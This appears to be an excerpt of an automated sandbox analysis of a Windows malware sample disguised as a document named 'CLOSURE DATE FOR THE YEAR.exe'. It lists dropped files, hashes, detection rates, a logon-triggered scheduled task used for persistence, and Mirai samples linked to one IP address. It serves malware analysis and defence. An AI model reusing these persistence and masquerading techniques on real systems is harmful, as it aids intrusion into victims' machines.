                                                                                  boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
                                                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
                                                                                  boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
                                                                                  boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
                                                                                  boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
                                                                                  boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):1.2659976902521664
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:VCueXhFNA0BU/iaGeJo1ZrUSajKzuiFuZ24IO88/:UueXhFhBU/iahCIKzuiFuY4IO88/
                                                                                  MD5:B870A7C2FFCF071AB6FB3D4B5D24E3BE
                                                                                  SHA1:D26F100899C08BCA3B0A1871A4306381840D018A
                                                                                  SHA-256:67725D3A3B9B1639B07AD30C206299AD6531AEA98D5E4BB4D00747B289072655
                                                                                  SHA-512:BA44572B622DC098C862E63381D3CF7EBEED65E21B1A32E6936FD25DD6BC60439D0FF33BD1C940598D7B838252D4F208264C1AFFB99E39329F47E3BEB00D635C
                                                                                  Malicious:false
                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.6.5.1.3.3.7.1.9.7.4.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.6.5.1.3.5.2.3.5.3.5.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.1.1.1.1.f.b.-.8.d.0.4.-.4.7.9.7.-.9.8.f.8.-.4.8.6.8.d.6.0.2.b.8.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.d.9.1.d.e.7.-.c.f.5.0.-.4.f.1.a.-.9.7.4.b.-.0.e.b.7.6.a.b.b.d.3.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.O.s.b.B.B.I.D.A.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.Y.y.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.7.8.-.0.0.0.1.-.0.0.1.4.-.e.a.3.1.-.3.7.a.6.1.0.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.d.0.a.7.f.a.a.d.e.4.9.0.6.8.f.1.e.7.b.8.9.2.6.1.5.e.1.3.1.8.0.0.0.0.0.0.0.0.!.0.0.0.0.3.e.4.7.2.7.a.6.8.d.9.a.4.e.e.3.d.c.3.a.f.7.9.4.0.8.d.6.0.9.1.6.7.7.7.c.1.5.4.6.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 15 streams, Wed Dec 4 05:52:14 2024, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):344354
                                                                                  Entropy (8bit):3.883200849076175
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:7P4IUAFJWMrf4uEquyQLTg5ywZrz7D96RRVNnibYtKAy:7lrFJWkf4jy2Tg5y6rfArVIYtK
                                                                                  MD5:A350164167A84E04882281C3F1E975D3
                                                                                  SHA1:8E995D54AD193EDC3B697BEBAF3D3E7AEDCA4BE3
                                                                                  SHA-256:BC8EAA2389A1B533E71A086E7CBE04A07616723EFF27BB559D446A65B18C5593
                                                                                  SHA-512:023CAF690E5378053B02F94B230EB8BE8C3A8CF8FE63C61DCB1C2D5F02614712CBB67BC177085329F244C4344D8E874FD704EF3671FDC85AF657A337D1DDF74D
                                                                                  Malicious:false
                                                                                  Preview:MDMP..a..... .........Og.........................#..........<... -.......2..2j..........`.......8...........T............F..r...........\-..........H/..............................................................................eJ......./......GenuineIntel............T.......x.....Og............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):6402
                                                                                  Entropy (8bit):3.7207691105799796
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:RSIU6o7wVetbk66kv9YZrKQE/nXGg5aM4U089bP+msf9F9pGm:R6l7wVeJk66klYZ26cpr089bmmsf9FCm
                                                                                  MD5:BBC0E884DB178317471ACB3F3324AF29
                                                                                  SHA1:FAEAEE5461E770602A0A4ED78B33CF088B10408D
                                                                                  SHA-256:13C7953E759FAA8EB27548FC65E227BFEC5201BF5490F1147811BA0B26A1BA8F
                                                                                  SHA-512:8FA37E283D759224F097CF3575DA0B490A16D7840CDAAC6B25B13BA82A99D3D0BA1C7AD2A99287AB68A4D11ECDB6EF9098118F195CE4FDD4898D0246B1C1F7A7
                                                                                  Malicious:false
                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.5.6.<./.P.i.
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4755
                                                                                  Entropy (8bit):4.4781577192689594
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwWl8zsZ7Jg77aI9LcVWpW8VYfOYm8M4Juh2mJO7FIzRlo+q8vc2mJOYRlrF8O:uIjfnI7Zck7ViJuhZtMKcZ5RlrGUyU3d
                                                                                  MD5:23E3816B2D1109D591CD841DD875AB96
                                                                                  SHA1:50000321FC37B8FC31230A4E37089355FD9E0044
                                                                                  SHA-256:10FB541BFFECBB6E57FD46C15AD61C7F99EBBEFFEE4B112758C75F589AAF98DB
                                                                                  SHA-512:1A0C2A5AB931A1CFBA6BABF117CBDF09BA2715B04416901BE746D52584A649CECE6FF08FB7B9E3AE85ACB009B4B23D1B03E781088D1DFF0AFBC139B39CA1E945
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="616134" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                  Process:C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.379633281639906
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:BWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:BLHxvCsIfA2KRHmOugo1s
                                                                                  MD5:8C2348BF92CE7E584CB478C92A7FDCC6
                                                                                  SHA1:2FD972BE064D5DEB2DDC72F288F2FE9CBA200A1E
                                                                                  SHA-256:082445C24C890503D54D015612AB11EE32C0C5D90ED6B25A17A9A1D012AEB482
                                                                                  SHA-512:716AD0151B4F5F0328903ECB43066787A821DDB7C6AD513F56AC4DD96C41F198CF75E3FDCA09A2BB0FF3DBE8088C8B93E7E82FBB5239DE374B4C991B60126F74
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1576
                                                                                  Entropy (8bit):5.10988635659308
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxiv
                                                                                  MD5:4746C4C07F3E8A1B14D7AFA27E57D2F0
                                                                                  SHA1:9A6E35FA2A11E803F5D3DA0E74A306F2EF3E2D35
                                                                                  SHA-256:D0C345C658891E7CA6935616E18BE2ADB6709C287D9B2E591E337EAC36806DE0
                                                                                  SHA-512:FA98616F000F274252960AA9496A2A5996711EDEE1E82E329CCB82D6DBDBF39F706A429704FFC17924BA5415D52FF2F27EA2524F4943A762D80A5397C0304F83
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                  Process:C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:modified
                                                                                  Size (bytes):1576
                                                                                  Entropy (8bit):5.10988635659308
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxiv
                                                                                  MD5:4746C4C07F3E8A1B14D7AFA27E57D2F0
                                                                                  SHA1:9A6E35FA2A11E803F5D3DA0E74A306F2EF3E2D35
                                                                                  SHA-256:D0C345C658891E7CA6935616E18BE2ADB6709C287D9B2E591E337EAC36806DE0
                                                                                  SHA-512:FA98616F000F274252960AA9496A2A5996711EDEE1E82E329CCB82D6DBDBF39F706A429704FFC17924BA5415D52FF2F27EA2524F4943A762D80A5397C0304F83
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1
                                                                                  Process:C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):630792
                                                                                  Entropy (8bit):7.684329132351894
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:+y4IR4R52J+XtWdNIyh1yxrgS1j/3XRaOzqiCShFgw64mLobm/IRskR:H4Iee7XthkxkS1jMi/KIt
                                                                                  MD5:17BF29A93776B4F6BE948802F652E6A9
                                                                                  SHA1:3E4727A68D9A4EE3DC3AF79408D60916777C1546
                                                                                  SHA-256:527A3BC0B6281D3E65CB6B19801B1A9D748D5AC773FCB4655EDC783534450816
                                                                                  SHA-512:DF9C87A3E89790924D63AFBD1DC339178D08B0F394DA16B728EE67D994337096FF969DE6224A49A4E6369A2329FE4DB9E5A89EB6C3F4F068E56B0365D02F2D0E
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Og..............0......P......^7... ...@....@.. ....................................@..................................7..K....@...M...........j...6........................................................... ............... ..H............text...d.... ...................... ..`.rsrc....M...@...N..................@..@.reloc...............h..............@..B................@7......H.......0.................................................................:....0;...q..V.^".).8 L#DF...Z.H.i.E..L...|D..r\..[...Z..{.WEt....=..9..CD.....z.l.V..`.......I.<mwR_.~....jr{.+K#C<.....v...PQ.'L.#.e.+h..8.C....ASV....../.>..@.UuZ.<.d.qOhb...$.R..y/...c...-...<i^....1.Nd.r..V.9.>..$0..G+<&<4..8.2,$...2Ol..h..25.4.~...+.....B.+B...C.yd..K...z.'.m..C\.....#.3..i.........c.....$.mT.A..+..4..c.g.O..G.Q...\6......a|..q3..i.......0..........(....*...0..
                                                                                  Process:C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):46
                                                                                  Entropy (8bit):1.0424600748477153
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:/lbq:4
                                                                                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                                  Malicious:false
                                                                                  Preview:........................................user.
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.684329132351894
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:CLOSURE DATE FOR THE YEAR.exe
                                                                                  File size:630'792 bytes
                                                                                  MD5:17bf29a93776b4f6be948802f652e6a9
                                                                                  SHA1:3e4727a68d9a4ee3dc3af79408d60916777c1546
                                                                                  SHA256:527a3bc0b6281d3e65cb6b19801b1a9d748d5ac773fcb4655edc783534450816
